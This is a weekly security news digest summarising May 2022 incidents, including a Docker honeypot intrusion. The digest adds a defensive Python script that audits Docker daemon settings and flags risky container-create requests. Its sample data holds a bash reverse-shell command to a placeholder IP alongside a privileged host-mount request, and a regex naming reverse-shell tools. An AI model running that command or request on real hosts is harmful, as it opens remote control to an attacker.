WEEK OF MAY 09, 2022
FBI conducted potentially millions of searches of Americans’ data last year, report says
- Searches in national-security investigations came without warrants, could stoke privacy concerns in Congress.
- An annual report published Friday by the Office of the Director of National Intelligence disclosed that the FBI conducted as many as 3.4 million searches of U.S. data that had been previously collected by the National Security Agency.
- Senior Biden administration officials said the actual number of searches is likely far lower, citing complexities in counting and sorting foreign data from U.S. data.
- It couldn’t be learned from the report how many Americans’ data was examined by the FBI under the program, though officials said it was also almost certainly a much smaller number.
Ikea Canada breach exposes 95K customer records
- An unauthorized employee accessed Ikea’s customer database, but it’s unclear what the intention was.
- The employee performed unsanctioned searches of the database between March 1 and 3, Kristin Newbigging, public relations leader at Ikea Canada, explains to Dark Reading. She adds that no banking information was exposed during the unauthorized system access.
- However, personally identifiable information was compromised, according to reports. That includes customer names, email addresses, phone numbers, and postal codes, along with IKEA Family loyalty program numbers in some cases.
- The company said there is no action required by Ikea customers, and that the company took “steps to prevent the data from being used, stored, or shared with any third parties.”
Russian ransomware group claims attack on Bulgarian refugee agency
- A ransomware group believed to have strong ties within Russia said Wednesday that it will release files it took from the Bulgarian government agency responsible for refugee management; Bulgaria has reportedly hosted hundreds of thousands of fleeing Ukrainians.
- LockBit 2.0 posted a notice to the dark web portal it uses to identify and extort its victims saying it had files from the Bulgarian State Agency for Refugees under the Council of Ministers. “All available data will be published!” the notice read under the group’s trademark bright red countdown clock, which has a May 9 publication date but no specific posted ransom demand.
- The agency didn’t immediately return an emailed request for comment. A spokesperson at the Bulgarian embassy in Washington, D.C., told CyberScoop Wednesday he didn’t have information on the incident and would look into it.
- The agency’s website remains functional, but a notice on the site’s home page says that “due to network problems, the e-addresses of the State Agency for Refugees at the Council of Ministers are temporarily unavailable!!!” according to a Google translation.
Expeditors outperforms Q1 forecasts despite being hobbled by cyberattack
- Tonnage was down because of the attack and freight costs were up, but revenues and slower expense growth allowed profits to rise
- It said its costs to fix a bevy of the problems created by the cyberattack — “investigation, recovery and remediation, including costs to recover its operational and accounting systems” — were estimated at $20 million.
- However, Expeditors added that it does not expect to incur significant capital expenses as a result of the cyberattack.
Docker under Siege: Cybercriminals compromise honeypots to ramp up attacks
- Cloud containers are increasingly part of the cybercrime playbook, with researchers flagging ongoing scanning for Docker weaknesses along with rapid exploitation to infect systems with coin-miners, denial-of-service tools, and ransomware.
- On May 5, researchers at cloud-management platform Uptycs said that attackers compromised the firm’s honeypot, a Docker server configured to allow connections through the remote Docker API.
- The attacks resulted in the cybercriminals installing cryptomining software and creating a reverse shell, which would have allowed them to explore the server in real time.
- The company has detected 10 to 20 attempts to compromise the honeypot server every day, suggesting that attackers have increased their interest in Docker-based infrastructure, says Amit Malik, director of threat research at Uptycs.
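The Uptycs honeypot was reachable because the Docker daemon accepted remote API connections without client authentication, and the intrusion itself consisted of API calls that created containers running a miner and a reverse shell. The following is an added example written for this digest, not code from Uptycs or the Docker project. It shows the two checks a practitioner would want: an audit of a daemon.json for TCP listeners that do not require client certificates (the `hosts`, `tlsverify` and `tlscacert` keys are real dockerd options; the file contents are constructed), and a triage of container-create request bodies in the shape of the Engine API's `POST /containers/create` (the request bodies, the IP address and the indicator patterns are constructed assumptions, not artifacts from the reported attack).

```python
import json
import re
from urllib.parse import urlparse

# Constructed daemon.json fragments for illustration (not from the article).
INSECURE_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""


def exposed_tcp_listeners(daemon_json: str) -> list:
    """Return every tcp:// listener that would accept API calls from any client.

    dockerd only authenticates clients when "tlsverify" is set (it then demands a
    client certificate signed by "tlscacert"); "tls": true alone encrypts the
    connection but still lets anyone who can reach the port drive the daemon.
    """
    cfg = json.loads(daemon_json)
    verifies_clients = bool(cfg.get("tlsverify"))
    findings = []
    for host in cfg.get("hosts", []):
        if urlparse(host).scheme == "tcp" and not verifies_clients:
            findings.append(host)
    return findings


# Constructed request bodies in the shape of POST /containers/create.
# The first mimics the honeypot intrusion pattern (privileged container, host
# filesystem mounted, interactive reverse shell); the second is a benign deploy.
CREATE_REQUESTS = [
    {
        "Image": "alpine",
        "Cmd": ["sh", "-c", "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"],
        "HostConfig": {"Binds": ["/:/mnt"], "Privileged": True},
    },
    {
        "Image": "nginx:1.25",
        "Cmd": None,
        "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
    },
]

# Assumed reverse-shell indicators: bash /dev/tcp redirection, nc -e, socat exec.
REVERSE_SHELL = re.compile(r"/dev/tcp/|\bnc(at)?\b.*\s-e\s|\bsocat\b.*exec:", re.IGNORECASE)

# Host paths that give a container control of the host when bind-mounted.
SENSITIVE_HOST_PATHS = {"/", "/var/run/docker.sock", "/etc", "/root"}


def suspicious_create(req: dict) -> list:
    """Return the reasons a container-create request looks like a takeover attempt."""
    reasons = []
    host_cfg = req.get("HostConfig") or {}
    if host_cfg.get("Privileged"):
        reasons.append("privileged")
    for bind in host_cfg.get("Binds") or []:
        src = bind.split(":")[0]            # Binds are "host:container[:opts]"
        if src in SENSITIVE_HOST_PATHS:
            reasons.append(f"host bind {src}")
    if host_cfg.get("PidMode") == "host":
        reasons.append("pid=host")
    cmd = " ".join(req.get("Cmd") or [])
    if REVERSE_SHELL.search(cmd):
        reasons.append("reverse-shell command")
    return reasons


if __name__ == "__main__":
    for label, cfg in (("insecure", INSECURE_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(f"{label}: unauthenticated listeners = {exposed_tcp_listeners(cfg)}")
    for req in CREATE_REQUESTS:
        print(f"{req['Image']}: {suspicious_create(req) or 'ok'}")
```

The daemon audit is the preventive control: a `tcp://` entry in `hosts` without `tlsverify` is exactly the exposure that turns a Docker host into a target for the 10 to 20 daily attempts Uptycs describes. The create-request triage is the detective control for hosts that must expose the API; run it over the daemon's API access log or a proxy in front of the socket, and alert on any request that combines a sensitive host mount or privileged mode with a shell command.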
Scammer infects his own machine with spyware, reveals true identity
- An operational slip-up led security researchers to an attacker associated with Nigerian letter scams and malware distribution, after he infected himself with Agent Tesla.
- Researchers from Malwarebytes got on his trail when they identified a group they track as “Nigerian Tesla” among numerous threat actors targeting Ukrainian entities.
- Malwarebytes had tracked the group for years initially while it was engaged in a string of so-called 419 advance fee fraud (aka Nigerian letter scams), where victims receive emails promising them a generous commission for facilitating a money transfer involving a large sum.
- Over the past two years, Malwarebytes researchers had observed the threat actor switching from 419 scams to distributing Agent Tesla, a widely used remote-access Trojan (RAT) for stealing personal data from infected systems.